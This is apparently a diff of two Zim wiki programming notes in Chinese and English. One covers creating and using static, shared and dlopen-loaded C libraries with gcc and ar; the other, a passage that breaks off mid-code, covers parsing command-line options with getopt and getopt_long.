===== 一、什么是程序库 =====
|
||||
|
||||
通俗的讲,**一个程序库就是目标程序文件的一个集合**。如果某些目标文件提供了解决一个特定问题的所需功能,我们就可以把这些目标文件归并为一个程序库,从而让应用开发者更易于访问这些目标文件,省得到处去找。
|
||||
|
||||
对于静态库,我们可以用实用程序ar来建立。当应用程序开发人员利用程序库进行程序的编译和连接时,程序库中为应用程序所需的那些元件就会**集成到最终生成的的可执行程**序中。之后,因为程序库已经融入应用程序的映像之中,成为它密不可分的一部分了,所以对应用程序来说,已经没什么外部的程序库可言了。
|
||||
|
||||
共享程序库(或者动态程序库)也会连接到一个应用程序的映像上,不过需要两个不同的步骤。第一步发生在**构建应用程序之时**,**链接程序**检查是否在应用程序或者程序库内部找到了构建应用程序所需的**全部符号(函数名或变量名)**。第二步发生在**运行时**,动态加载器把所需的共享库载入内存,然后动态地把它链接到应用程序的映像之中。注意,这里与静态程序库不同,这次并没有把共享程序库中的所需元件放入应用程序的映像之中。很明显,这样生成的应用程序映像较小,因为共享程序库和应用程序的映像是相互独立的。
|
||||
|
||||
虽然共享库能够节约内存,但是这是有代价的——必须在运行时解析程序库。很明显,要想弄清需要哪些库,然后寻找这些库并将其载入内存肯定是需要一定时间的。
|
||||
|
||||
本文中,我们会建立两个程序库,一个静态库和一个动态库,并以各自的方式应用于程序之中,以此亲身体验两者之间的区别。
|
||||
|
||||
===== 二、静态库的创建和使用 =====
|
||||
|
||||
相对于动态链接库,静态库要简单一些,它被静态的链接到应用程序的映像之中。这意味着,映像一旦建好,外部程序库的有无对映像的执行将毫无影响,因为所需的部分已经放进程序二进制映像了。
|
||||
|
||||
下面我们来演示如何用一组源文件来构造一个程序库。我们建立的程序库是用来封装GNU/Linux的随机函数的,这样我们的库就可以**对外提供**随机数生成器了。现在看一下我们的**程序库为应用程序提供的接口**(API),我们将其放在头文件randapi.h中,如下所示:
|
||||
|
||||
//randapi.h, the interface of our library

#ifndef __RAND_API_H
#define __RAND_API_H

extern void initRand( void );
extern float getSRand( void );
extern int getRand( int max );

#endif /* __RAND_API_H */
|
||||
|
||||
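Our API consists of three functions. The first, initRand(), is an initialization function: it prepares the library for use and must be called before any of the other random functions. The second, getSRand(), returns a random floating-point number between 0.0 and 1.0. The last, getRand(x), returns a random integer between 0 and (x-1).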
|
||||
|
||||
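The file initapi.c holds the implementation of the initialization function initRand(), which seeds the random number generator with the current time. The code is as follows: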
|
||||
|
||||
//initapi.c, source of the initialization function initRand()
#include <stdlib.h>
#include <time.h>

//initRand() initializes the random number generator

void initRand()
{
    time_t seed;
    seed = time(NULL);
    srand( seed );
    return;
}
|
||||
|
||||
文件randapi.c是我们最后一个实现API的文件,它也提供了一个随机数函数,源代码如下所示:
|
||||
|
||||
//randapi.c, implementation of the random number API
#include <stdlib.h>
//getSRand() returns a floating-point number between 0.0 and 1.0
float getSRand()
{
    float randvalue;

    randvalue = ((float)rand() / (float)RAND_MAX);

    return randvalue;
}

//getRand() returns an integer between 0 and (max-1)
int getRand( int max )
{
    int randvalue;

    //computed in double: a float cannot hold rand() exactly, so the result could round up to max
    randvalue = (int)((double)max * rand() / (RAND_MAX+1.0));

    return randvalue;
}
|
||||
|
||||
这就是我们的API了,注意,initapi.c和randapi.c的函数原型都放在了同一个头文件中,即randapi.h。当然,我们完全可以在单个文件中来实现这些功能,但是为了示范程序库的建立,我们故意将它们放到不同的文件中。
|
||||
|
||||
现在,我们在来看一下使用这些API的测试程序,该程序将**使用我们的程序库提供的应用编程接口进行工作**。这个应用程序通过计算随机数函数返回的的平均值来快速检验API,因为平均值应该在随机数范围的中间附近。该程序的代码如下所示:
|
||||
|
||||
//test.c, an application that tests the API of our library
#include <stdio.h>
#include "randapi.h"
#define ITERATIONS 1000000L
int main(){
    long i;
    long isum;
    float fsum;
    /* initialize the random number API */
    initRand();
    /* compute the average of the values returned by getRand(10) */
    isum = 0L;
    for (i = 0 ; i < ITERATIONS ; i++){
        isum += getRand(10);
    }
    printf( "getRand() Average %d\n", (int)(isum / ITERATIONS) );
    /* compute the average of the values returned by getSRand() */
    fsum = 0.0;
    for (i = 0 ; i < ITERATIONS ; i++){
        fsum += getSRand();
    }
    printf( "getSRand() Average %f\n", (fsum / (float)ITERATIONS) );
    return 0;
}
|
||||
|
||||
通过下列命令,可以编译所有源文件并将其综合成单个映像:
|
||||
|
||||
**$ gcc initapi.c randapi.c test.c -o test**
|
||||
|
||||
上述gcc命令将编译三个文件,并把它们连接成单个映像,该映像名为test。运行该映像时,我们将看到各随机数函数的平均值:
|
||||
|
||||
$ ./test
getRand() Average 4
getSRand() Average 0.500003
$
|
||||
|
||||
我们看到,结果和预期的一样,产生的随机数的平均值正好在随机数范围的中间值附近。然而,我们想要的可不是把所有源代码编译成单个映像,而是建立一个随机数函数库。别急,我们现在就开始使用ar实用程序来达到此目。您可以通过下面的命令,在获得最终的二进制映像的同时,还会生成我们的第一个静态库。
|
||||
|
||||
$ gcc -c -Wall initapi.c
$ gcc -c -Wall randapi.c
__$ ar -cru libmyrand.a initapi.o randapi.o__
$
|
||||
|
||||
这里,我们首先使用gcc编译了两个源文件initapi.c和randapi.c,其中-c选项是告诉gcc仅编译而不链接,并开启所有警告。接下来,我们使用ar命令来生成咱们的程序库libmyrand.a。其中cru选项是创建或者添加存档时的标准设置,**c选项表示要建立静态库**,如果静态库早已存在,则忽略该选项。**选项r的作用是让ar替换静态库中的现有目标**,当然是它们业已存在的话。
|
||||
|
||||
最后,选项u的作用是为保险起见,只有当新生成的目标文件比存档中原有的目标文件要新时才替换同名的目标文件。
|
||||
|
||||
如今,我们已经得到了一个名为libmyrand.a的新文件,它就是我们想要的静态库。该静态库中存有两个目标程序,即initapi.o和randapi.o。那么,我们如何利用这个静态库来构建应用程序呢?别急,继续往下看。方法很简单,如下所示:
|
||||
|
||||
$ gcc test.c __-L. -lmyrand__ -o test
$ ./test
getRand() Average 4
getSRand() Average 0.499892
$
|
||||
|
||||
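Here gcc first compiles test.c and then links the resulting object file test.o against libmyrand.a to produce the executable. The option -L. tells gcc that the library is in the current directory (the dot . denotes the current directory).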
|
||||
|
||||
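Note that we can also give a specific directory for the library, for example -L/usr/mylibs. The option -l names the library to link against. Also note that myrand is not the file name of our library; the file name is libmyrand.a. With -l, the linker adds lib in front of the given name and .a after it, so specifying -ltest makes it look for a library named libtest.a.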
|
||||
|
||||
我们已经了解了创建程序库以及使用它来构建应用程序的方法,现在让我们继续探讨一下ar程序的用法。我们可以通过-t选项来调查静态库中到底包含了哪些内容,如下所示:
|
||||
|
||||
__$ ar -t libmyrand.a__
initapi.o
randapi.o
$
|
||||
|
||||
如果需要的话,我们还可以删除静态库中的目标程序,为此需要用到-__d选项__,如下所示:
|
||||
|
||||
$ __ar -d libmyrand.a initapi.o__
$ ar -t libmyrand.a
randapi.o
$
|
||||
|
||||
这里要引起注意的是,使用上述命令ar执行删除任务失败时,它是不会通知我们的,要想查看出错信息,需要添加__-v选项__,如下所示:
|
||||
|
||||
$ ar -d libmyrand.a initapi.o
$ ar -dv libmyrand.a initapi.o
No member named 'initapi.o'
$
|
||||
|
||||
在前一种情况下,如果我们试图删除目标文件initapi.o,尽管该静态库中并没有这个文件,但是却没有产生任何错误消息。在第二种情况下,我们添加v选项后就得到了相应的错误信息。我们不仅可以从静态库删除目标文件,还可以通过-__x选项来从中提取目标文件__,如下所示:
|
||||
|
||||
$ __ar -xv libmyrand.a initapi.o__
x - initapi.o
$ ls
initapi.o libmyrand.a
$ ar -t libmyrand.a
randapi.o
initapi.o
$
|
||||
|
||||
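Combining -x with -v gives more information. Running ls in the directory shows the file that ar extracted. Note that we also listed the contents of the static library after the extraction, and initapi.o is still there. In other words, __extraction does not remove the object file from the static library__; it only makes a copy. To remove an object file from the static library, use the delete option -d.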
|
||||
|
||||
===== 三、共享库的创建和使用 =====
|
||||
|
||||
现在,我们开始介绍共享库,为了省劲,我们依然使用前面的测试程序。首先,我们用initapi.o和randapi.o这两个目标文件来建立一个共享库。与静态库相比,在为共享库编译源代码时有些不同之处。
|
||||
|
||||
与使用静态库的情形不同,使用共享库时,程序库并没有放进应用程序的可执行文件中,所以__共享库的代码应该使用相对寻址方式__,比如通过全局偏移表(GOT)寻址。加载共享库时,加载器会自动地解析所有GOT地址。编译源文件时,为了让生成的__目标文件具有位置无关性__,我们需要使用gcc的PIC选项:
|
||||
|
||||
$ __gcc -fPIC -c initapi.c__
$ gcc -fPIC -c randapi.c
|
||||
|
||||
这样得到的两个目标文件的代码就具有位置无关性。我们可以使用带有-shared标志的gcc命令来创建一个共享库,这个标志的作用是告诉gcc要建立的是一个共享库:
|
||||
|
||||
$__ gcc -shared initapi.o randapi.o -o libmyrand.so__
|
||||
|
||||
我们利用-o规定两个目标模块作为共享库输出。注意,这里我们使用.so后缀来指出该文件是一个共享库。为了使用新建的共享库,即共享目标文件来创建应用程序,我们需要连接共享库中的所需元素,这一点与静态库是一致的:
|
||||
|
||||
$ gcc test.c -L. -lmyrand -o test
|
||||
|
||||
要想知道新的二进制映像依赖于哪些共享库,可以使用ldd命令,该命令会打印出某个应用程序所依赖的共享库。举例来说:
|
||||
|
||||
$ __ldd test__
libmyrand.so => not found
libc.so.6 => /lib/tls/libc.so.6 (0x42000000)
/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
$
|
||||
|
||||
命令ldd能确定出我们的测试程序需要用到哪些共享库。其中__libc.so.6__是标准C库,__ld-linux.so.2__是动态链接器/装载器。注意,这里显示没有发现libmyrand.so,这是因为虽然该文件存在于应用程序的目录中,但是我们必须显式指出。我们可以通过环境变量LD_LIBRARY_PATH来完成此任务。给出我们的共享库的位置之后,再次使用ldd命令:
|
||||
|
||||
$ __export LD_LIBRARY_PATH=./__
$ ldd test
libmyrand.so => ./libmyrand.so (0x40017000)
libc.so.6 => /lib/tls/libc.so.6 (0x42000000)
/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
$
|
||||
|
||||
我们显式说明了共享库位于当前目录(./)之后,再次运行ldd命令,它现在终于找到所需共享库了。如果我们不这样做就急着执行我们的应用程序的话,将会收到一条错误消息,指出找不到所需的共享库,如下所示:
|
||||
|
||||
$ ./test
./test: error while loading shared libraries: libmyrand.so:
cannot find shared object file: No such file or directory.
$
|
||||
|
||||
===== 四、动态库的创建和使用 =====
|
||||
|
||||
我们最后要介绍的是一种动态加载的共享库,或称为__动态链接库__。它的特点是__在应用程序运行过程中,什么时候需要了才装入内存,而不是像共享库那样当应用程序启动时就把程序库装入内存__。为此,我们还要像前面那样来构建共享的目标文件,如下所示:
|
||||
|
||||
$ gcc -fPIC -c initapi.c
$ gcc -fPIC -c randapi.c
$ gcc -shared initapi.o randapi.o -o libmyrand.so
$ su -
<provide your root password>
# cp libmyrand.so /usr/local/lib
# exit
|
||||
|
||||
在这里,我们将我们的共享库放到一个公共位置,即/usr/local/lib目录。就像我们所看到的那样,静态库和共享库通常跟应用程序的二进制文件放置在同一目录下,与之不同,动态链接库则一般放在/usr/local/lib目录中。**这个库跟原来的共享库在功能上是等价的,只是应用程序使用它们的方式有所区别**。需要说明的是,为了把我们的程序库复制到/usr/local/lib中,需要root权限。为此,可以首先使用su命令变成root用户。
|
||||
|
||||
现在,我们已经重建了自己的共享库,接下来就是我们的测试程序如何__动态使用__它了。为此,我们必须对测试程序访问API的方式做一些修改。然后,我们再来看一下如何构建使用动态链接库的程序。更新后的测试程序代码如下所示:
|
||||
|
||||
//test program for the dynamically loaded library
#include <stdlib.h>
#include <stdio.h>
#include <dlfcn.h>
#include "randapi.h"

#define ITERATIONS 1000000L

int main()
{
    long i;
    long isum;
    float fsum;
    void *handle;
    char *err;

    void (*initRand_d)(void);
    float (*getSRand_d)(void);
    int (*getRand_d)(int);

    //open a handle to the dynamic library
    handle = dlopen( "/usr/local/lib/libmyrand.so", RTLD_LAZY );
    if (handle == (void *)0)
    {
        fputs( dlerror(), stderr );
        exit(-1);
    }

    //look up initRand() and check for errors
    initRand_d = dlsym( handle, "initRand" );
    err = dlerror();
    if (err != NULL)
    {
        fputs( err, stderr );
        exit(-1);
    }
    //look up getSRand() and check for errors
    getSRand_d = dlsym( handle, "getSRand" );
    err = dlerror();
    if (err != NULL)
    {
        fputs( err, stderr );
        exit(-1);
    }
    //look up getRand() and check for errors
    getRand_d = dlsym( handle, "getRand" );
    err = dlerror();
    if (err != NULL)
    {
        fputs( err, stderr );
        exit(-1);
    }
    //initialize the random number API
    (*initRand_d)();
    //compute the average of the values returned by getRand(10)
    isum = 0L;
    for (i = 0 ; i < ITERATIONS ; i++)
    {
        isum += (*getRand_d)(10);
    }
    printf( "getRand() Average %d\n", (int)(isum / ITERATIONS) );
    //compute the average of the values returned by getSRand()
    fsum = 0.0;
    for (i = 0 ; i < ITERATIONS ; i++)
    {
        fsum += (*getSRand_d)();
    }
    printf( "getSRand() Average %f\n", (fsum / (float)ITERATIONS) );
    //close the handle to the dynamic library
    dlclose( handle );
    return 0;
}
|
||||
|
||||
与之前的代码相比,您可能觉得这里的有些费解,但是只要弄懂了DL API的工作方式,一切问题就迎刃而解了。我们这里的真实意图是,先使用dlopen打开共享目标文件,然后通过dlsym让一个局部函数指针指向共享目标文件中的函数。这使得我们可以之后从应用程序中调用该函数。做完这些后,使用dlclose关闭共享库,清除所有引用,即释放为该接口分配的所有内存。
|
||||
|
||||
为了能够使用这些DL API,我们需要在应用程序中包含头文件dlfcn.h。使用动态库的第一步是用dlopen来打开它,其中代码为:
|
||||
|
||||
handle = dlopen( "/usr/local/lib/libmyrand.so", RTLD_LAZY );
|
||||
|
||||
我们不仅要规定要使用的程序库(本例为/usr/local/lib/libmyrand.so),除此之外还得规定一个标志。我们这里可能用到的标志有两个,RTLD_LAZY和RTLD_NOW,如果规定RTLD_LAZY,那么就会在将来**用到时才解析引用**;如果规定RTLD_NOW标志的话,就会在**装入程序库时就解析各种引用**。如果函数dlopen返回的是一个opaque句柄,说明程序库已经打开了。需要注意的是,如果出现错误的话,我们可以使用dlerror函数向stdout或者stderr输出错误信息。此外,如果必要的话,我们可以在共享库中创建一个名为___init__的函数,这样通过dlopen打开我们的共享库时,就会调用该函数,以进行初始化。因为dlopen函数总是在返回到调用者之前调用这个_init函数。
|
||||
|
||||
|
||||
下面,让我们看看是如何引用库中的函数的,或者说如何通过函数名来调用库函数的。先看一下下面的代码:
|
||||
|
||||
initRand_d = dlsym( handle, "initRand" );
err = dlerror();
if (err != NULL)
{
    fputs( err, stderr );
    exit(-1);
}
|
||||
|
||||
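As this fragment shows, the procedure is simple. The API function dlsym searches our shared library for the named function, in this case the initialization function initRand. If it is found, dlsym returns a void * pointer, which is stored in a local function pointer variable so that the function can then be called to do the actual initialization. We then check the error state: if dlerror returns an error string, the program prints it and exits. This is how the shared library functions we want to call are located. After obtaining the pointer to initRand, we obtain the pointers to getSRand and getRand in the same way.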
|
||||
|
||||
我们的测试程序基本没变,只是__没有直接调用函数,而是使用指针到函数的接口来间接调用它们__。我们看到,虽然动态载入的接口在灵活性方面有所提高,但是在性能上却稍微有所损失。
|
||||
|
||||
在新测试程序中,最后一步是**关闭程序库**,这是通过API函数dlclose来进行的。如果该API发现没有其他用户再使用该共享库的话,它就会将其卸载。
|
||||
|
||||
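Like dlopen, dlclose provides a mechanism through which the shared object can export a completion routine that is called when the API function dlclose is invoked. The developer only needs to add a function named _fini to the shared library, and dlclose will call the ___fini__ function before it returns.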
|
||||
|
||||
看到了吧,虽然需要少量的改动,但是应用程序使用动态载入的共享库之后,**不仅带来了更大的灵活性,而且还可以显著的节约内存**(参见前面的图1和图2)。需要注意的是,当应用程序启动时,**并不要求所有的动态函数对它都是可见的。相反,只有在程序运行到需要这些函数的时候,才会加载动态库**,在此之前,程序一直不需要它们。
|
||||
|
||||
动态加载的程序库API非常简单,为完整起见我们在此简单加以介绍:
|
||||
|
||||
void *dlopen( const char *filename, int flag );
char *dlerror( void );
void *dlsym( void *handle, const char *symbol );
int dlclose( void *handle );
|
||||
|
||||
===== 五、结束语 =====
|
||||
|
||||
在本文中,我们探讨了各种程序库的创建和使用方法。我们首先介绍了静态库,然后讨论共享库,最后讲解了动态加载的程序库,同时,我们还以源码的形式演示了使用ar命令和gcc创建程序库的方法,并用一个示例程序对它们的使用做出了演示。
|
||||
|
||||
最后要说明的是,**每一个库应当对应于一个特定的问题**。如果某个函数不是专门用来解决给定问题的,我们就应该将其排除在该程序库之外,并考虑将其放入其他的程序库。这一点希望读者要引起注意。
|
||||
449
Zim/Programme/APUE/Linux程序设计——用getopt处理命令行参数.txt
Normal file
@@ -0,0 +1,449 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-03-27T20:51:14+08:00
|
||||
|
||||
====== Linux程序设计——用getopt处理命令行参数 ======
|
||||
Created Sunday 27 March 2011
|
||||
|
||||
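Many Linux programs, even those with a graphical user interface (GUI), accept and process command-line options. For some programs this is the main way of interacting with the user. A reliable mechanism for handling complex command-line arguments makes an application better and more useful. getopt() is a library function designed specifically to ease the burden of command-line processing.

1. Command-line arguments

The first task in command-line programming is to parse the command-line arguments, something GUI programmers rarely have to think about. Here we use an informal definition of an argument: any string on the command line other than the command name. The arguments consist of several items separated from one another by whitespace.

Arguments are further divided into options and operands. Options modify the default behavior of the program or supply information to it; by long-standing convention they begin with a dash. An option may be followed by arguments of its own, called option arguments. Everything that remains is an operand.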
|
||||
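2. POSIX conventions

POSIX stands for Portable Operating System Interface. The Institute of Electrical and Electronics Engineers (IEEE) originally developed the POSIX standard to improve the portability of applications across UNIX environments. POSIX is not limited to UNIX, however; many other operating systems, such as DEC OpenVMS and Microsoft Windows NT, support the POSIX standard.

The POSIX conventions for program names and arguments are:

Program names should be no fewer than 2 and no more than 9 characters long;
Program names should contain only lowercase letters and digits;
Option names should be a single character or a single digit, prefixed with a dash '-';
Multiple options that take no option argument may be combined (for example, foo -a -b -c ----> foo -abc);
An option and its argument are separated by whitespace;
Option arguments are not optional.
If an option argument has multiple values, they are passed in as a single string, for example myprog -u "arnold,joe,jane". In that case the program must split the values itself.
Options should appear before operands.
The special argument '--' marks the end of the options; every argument after it is treated as an operand.
The order of options does not matter, but for mutually exclusive options, where one option overrides the effect of another, the last one wins; if an option is repeated, the occurrences are processed in order.
The order of operands may affect program behavior, but this must be documented.
Programs that read or write named files should treat a single '-' argument as meaning standard input or standard output.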
|
||||
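3. GNU long options

GNU encourages programmers to use long options of the form --help, --verbose, and so on. These options do not conflict with the POSIX conventions, are easy to remember, and offer a chance to keep all GNU tools consistent. GNU long options have conventions of their own:

For GNU programs that already follow the POSIX conventions, every short option has a corresponding long option.
Additional GNU-specific long options need not have a corresponding short option, although one is recommended.
A long option may be abbreviated to the shortest string that remains unique.
An option argument is separated from its long option either by whitespace or by an '='.
Option arguments may be optional; for a long option, an optional argument must be attached with '='.
Long options may be allowed with a single dash as the prefix.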
|
||||
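4. Basic command-line processing

A C program accesses its command-line arguments through the argc and argv parameters. argc is an integer giving the number of arguments (including the command name). main() can be defined in two ways, which differ only in how argv is declared:

int main(int argc, char *argv[])
{
……
}

int main(int argc, char **argv)
{
……
}

By the time the C runtime's startup code calls main(), the command line has already been processed. argc holds the argument count, and argv holds an array of pointers to the arguments. argv[0] is the program name.

A very simple example of command-line processing is the echo program, which prints its arguments to standard output separated by spaces and ends with a newline. If the first command-line argument is -n, the trailing newline is omitted.

Listing 1: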
|
||||
|
||||
#include <stdio.h>
|
||||
|
||||
int main(int argc, char **argv)
|
||||
{
|
||||
int i, nflg;
|
||||
|
||||
nflg = 0;
|
||||
if(argc > 1 && argv[1][0] == '-' && argv[1][1] == 'n'){
|
||||
nflg++;
|
||||
argc--;
|
||||
argv++;
|
||||
}
|
||||
for(i=1; i<argc; i++){
|
||||
fputs(argv[i], stdout);
|
||||
if(i < argc-1)
|
||||
putchar(' ');
|
||||
}
|
||||
if(nflg == 0)
|
||||
putchar('\n');
|
||||
|
||||
return 0;
|
||||
}
|
||||
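In the echo program the command-line arguments are parsed by hand. Long ago, the UNIX Support Group developed the getopt() function to simplify command-line parsing, together with several external variables, making it easier to write POSIX-conforming code.

5. The command-line parsing function getopt()

getopt() is declared as follows: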
|
||||
|
||||
#include <unistd.h>
|
||||
|
||||
int getopt(int argc, char * const argv[], const char *optstring);
|
||||
|
||||
extern char *optarg;
|
||||
extern int optind, opterr, optopt;
|
||||
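The argc and argv arguments are normally passed straight through from main(). optstring is a string of option letters. If a letter in the string is followed by a colon, that option requires an option argument.

Given the argument count (argc), the argument array (argv), and the option string (optstring), getopt() returns the first option and sets some global variables. Called again with the same arguments, it returns the next option and sets the corresponding globals. When no recognizable options remain, it returns -1 and the job is done.

The global variables set by getopt() are:

char *optarg: the argument string of the current option, if any.
int optind: the current index into argv. When getopt() is used in a while loop, the strings remaining after the loop ends are the operands, found in argv[optind] through argv[argc-1].
int opterr: when this variable is nonzero, getopt() prints its own error messages for "invalid option" and "missing option argument".
int optopt: when an invalid option character is found, getopt() returns either '?' or ':', and optopt contains the offending option character.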
|
||||
Take the following program as an example:

Options:

-n: print "my name".
-g: print "my girlfriend's name".
-l: an option that takes an argument.

Listing 2:
|
||||
|
||||
#include <stdio.h>
|
||||
#include <unistd.h>
|
||||
|
||||
int main (int argc, char **argv)
|
||||
{
|
||||
int oc; /* option character */
char *b_opt_arg; /* option-argument string */
|
||||
|
||||
while((oc = getopt(argc, argv, "ngl:")) != -1)
|
||||
{
|
||||
switch(oc)
|
||||
{
|
||||
case 'n':
|
||||
printf("My name is Lyong.\n");
|
||||
break;
|
||||
case 'g':
|
||||
printf("Her name is Xxiong.\n");
|
||||
break;
|
||||
case 'l':
|
||||
b_opt_arg = optarg;
|
||||
printf("Our love is %s\n", optarg);
|
||||
break;
|
||||
}
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
Output:
|
||||
|
||||
$ ./opt_parse_demo -n
|
||||
My name is Lyong.
|
||||
$ ./opt_parse_demo -g
|
||||
Her name is Xxiong.
|
||||
$ ./opt_parse_demo -l forever
|
||||
Our love is forever
|
||||
$ ./opt_parse_demo -ngl forever
|
||||
My name is Lyong.
|
||||
Her name is Xxiong.
|
||||
Our love is forever
|
||||
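6. Changing how getopt() reports invalid command-line arguments

Programs will inevitably be invoked incorrectly, either with an invalid option or with a missing option argument. Normally getopt() prints its own error message in both cases (this is the default) and returns '?'. To verify this, modify the code of Listing 2 above.

Listing 3: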
|
||||
|
||||
#include <stdio.h>
|
||||
#include <unistd.h>
|
||||
|
||||
int main (int argc, char **argv)
|
||||
{
|
||||
int oc; /* option character */
char *b_opt_arg; /* option-argument string */
|
||||
|
||||
while((oc = getopt(argc, argv, "ngl:")) != -1)
|
||||
{
|
||||
switch(oc)
|
||||
{
|
||||
case 'n':
|
||||
printf("My name is Lyong.\n");
|
||||
break;
|
||||
case 'g':
|
||||
printf("Her name is Xxiong.\n");
|
||||
break;
|
||||
case 'l':
|
||||
b_opt_arg = optarg;
|
||||
printf("Our love is %s\n", optarg);
|
||||
break;
|
||||
case '?':
|
||||
printf("arguments error!\n");
|
||||
break;
|
||||
}
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
Entering an incorrect command line gives:
|
||||
|
||||
$ ./opt_parse_demo -l
|
||||
./opt_parse_demo: option requires an argument -- l
|
||||
arguments error!
|
||||
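If you would rather print no error message at all, or print your own, there are two ways to change how getopt() reports errors:

Set opterr to 0 before calling getopt(), which forces getopt() to print nothing when it detects an error.
If the first character of optstring is a colon, getopt() stays silent and returns a different character depending on the error:
"Invalid option": getopt() returns '?' and optopt contains the invalid option character (this is the normal behavior).
"Missing option argument": getopt() returns ':'. If the first character of optstring is not a colon, getopt() returns '?' instead, which makes this case indistinguishable from an invalid option.

Listing 4: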
|
||||
|
||||
#include <stdio.h>
|
||||
#include <unistd.h>
|
||||
|
||||
int main (int argc, char **argv)
|
||||
{
|
||||
int oc; /* option character */
char ec; /* invalid option character */
char *b_opt_arg; /* option-argument string */
|
||||
|
||||
while((oc = getopt(argc, argv, ":ngl:")) != -1)
|
||||
{
|
||||
switch(oc)
|
||||
{
|
||||
case 'n':
|
||||
printf("My name is Lyong.\n");
|
||||
break;
|
||||
case 'g':
|
||||
printf("Her name is Xxiong.\n");
|
||||
break;
|
||||
case 'l':
|
||||
b_opt_arg = optarg;
|
||||
printf("Our love is %s\n", optarg);
|
||||
break;
|
||||
case '?':
ec = (char)optopt;
printf("Invalid option character ' %c '!\n", ec);
break;
case ':':
printf("Missing option argument!\n");
break;
}
}
return 0;
}

Test results:

$ ./opt_parse_demo -a
Invalid option character ' a '!
$ ./opt_parse_demo -l
Missing option argument!
|
||||
|
||||
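7. Features of the GNU getopt() function

The getopt() described so far is the one provided by the UNIX Support Group; it stops looking for options as soon as it meets a command-line argument that does not begin with '-'. GNU getopt() differs: it scans the entire command line for options. As it processes the arguments, GNU getopt() rearranges the elements of argv so that, when it is done, all options have been moved to the front and code that goes on to examine the remaining arguments in argv[optind] through argv[argc-1] still works. In every case, though, the special argument '--' ends the scan for options.

You can enter an out-of-order command line and look at the output of opt_parse_demo: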
|
||||
|
||||
$ ./opt_parse_demo -l forever a b c d -g -n
|
||||
Our love is forever
|
||||
Her name is Xxiong.
|
||||
My name is Lyong.
|
||||
|
||||
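The second feature of GNU getopt() is that a special first character in optstring changes its default behavior:

optstring[0] = '+': getopt() behaves much like the version provided by the UNIX Support Group.
optstring[0] = '-': every non-option command-line argument is returned in optarg, as if it were the argument of an option whose character code is 1.
In both cases ':' may be used as the second character.

The third feature of GNU getopt() is that an option character followed by two colons in optstring may take an optional option argument. When the argument is absent, GNU getopt() returns the option character and sets optarg to NULL.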
|
||||
|
||||
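8. Parsing GNU long options

In the 1990s, UNIX applications began to support long options: a pair of dashes, a descriptive option name, and optionally an argument joined to the option with an equals sign.

GNU provides the getopt_long() and getopt_long_only() functions to parse command lines with long options; with the latter, long options may begin with a single dash rather than a pair.

getopt_long() is the version of getopt() that supports both long and short options. The declarations are: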
|
||||
|
||||
#include <getopt.h>
|
||||
|
||||
int getopt_long(int argc, char * const argv[], const char *optstring, const struct option *longopts, int *longindex);
|
||||
|
||||
int getopt_long_only(int argc, char * const argv[],const char *optstring,const struct option *longopts, int *longindex);
|
||||
|
||||
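The first three arguments of getopt_long() are the same as those of getopt() above. The fourth argument points to an array of option structures, known as the "long-option table". If longindex is not NULL, it points to a variable that receives the index in the longopts array of the long option that was found, which is useful for error diagnostics.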
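The use of longindex can be sketched as follows. This is only an illustration under stated assumptions: the table demo_longopts and the function first_long_option_name are hypothetical names, modelled on the options used in this article, and the sketch relies on getopt_long() leaving longindex untouched when a short option is matched.

```c
#include <assert.h>
#include <getopt.h>
#include <stddef.h>

/* Hypothetical long-option table, modelled on the one in this article. */
static const struct option demo_longopts[] = {
    { "name",    no_argument,       NULL, 'n' },
    { "gf_name", no_argument,       NULL, 'g' },
    { "love",    required_argument, NULL, 'l' },
    { 0, 0, 0, 0 }
};

/*
 * Return the table name of the first option on the command line if it is
 * a long option, or NULL if it is a short option, invalid, or absent.
 */
const char *first_long_option_name(int argc, char **argv)
{
    int longindex = -1;  /* stays -1 unless a long option is matched */
    int c;

    assert(argv != NULL);
    optind = 1;          /* restart scanning */
    opterr = 0;          /* no automatic error messages */

    c = getopt_long(argc, argv, ":ngl:", demo_longopts, &longindex);
    if (c == -1 || c == '?' || c == ':' || longindex < 0)
        return NULL;
    return demo_longopts[longindex].name;
}
```

Because the lookup goes through the table, an abbreviated option such as --lo=x is reported under its full name, which is handy in diagnostics.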
|
||||
|
||||
The option structure is declared in getopt.h as follows:
|
||||
|
||||
struct option{
|
||||
const char *name;
|
||||
int has_arg;
|
||||
int *flag;
|
||||
int val;
|
||||
};
|
||||
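The members of the structure are explained below:

const char *name

The option name, without the leading dashes, for example "help" or "verbose".

int has_arg

Says whether the option takes an option argument and, if so, of what kind. Its value must be one of the following:

Symbolic constant    Value  Meaning
no_argument          0      the option takes no argument
required_argument    1      the option requires an argument
optional_argument    2      the option's argument is optional

int *flag

If this pointer is NULL, getopt_long() returns the value of the structure's val field. If it is not NULL, getopt_long() stores the value of val in the variable it points to and returns 0. If flag is not NULL but the long option is never found, the variable it points to is left unchanged.

int val

The value to return when the long option is found, or the value to store in *flag when flag is not NULL. Typically, when flag is not NULL, val is a true/false value such as 1 or 0; when flag is NULL, val is usually a character constant. If the long option has a short equivalent, this character constant should be the same one that appears in optstring for that option. (getopt() returns the single character of a short option and getopt_long() returns the single character specified for a long option; if the two characters match, the existing code that handles short options can be reused with getopt_long().)

Each long option has its own entry in the long-option table, filled in with the correct values. The last element of the array must be all zeros. The array need not be sorted, since getopt_long() performs a linear search, but sorting it by long name makes it easier for programmers to read.

The uses of flag and val described above may look a little confusing, but they are very useful in practice, so it is worth understanding them thoroughly.

Most of the time, the programmer sets flag variables during option processing according to the options that are found. With getopt(), for instance, code often takes the following shape: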
|
||||
|
||||
int do_name, do_gf_name, do_love; /* flag variables */
char *b_opt_arg;

while((c = getopt(argc, argv, ":ngl:")) != -1)
{
switch (c){
case 'n':
do_name = 1;
break;
case 'g':
do_gf_name = 1;
break;
case 'l':
b_opt_arg = optarg;
……
}
}

When flag is not NULL, getopt_long() sets the flag variable for you. In the code above, the handling of options 'n' and 'g' does nothing but set a flag; with a non-NULL flag, getopt_long() sets the flag variable of each such option automatically, which reduces those two cases of the switch statement to one. Below is an example of a long-option table and the code that handles it.

Listing 5:
|
||||
|
||||
|
||||
#include <stdio.h>
|
||||
#include <getopt.h>
|
||||
|
||||
int do_name, do_gf_name;
|
||||
char *l_opt_arg;
|
||||
|
||||
struct option longopts[] = {
|
||||
{ "name", no_argument, &do_name, 1 },
|
||||
{ "gf_name", no_argument, &do_gf_name, 1 },
|
||||
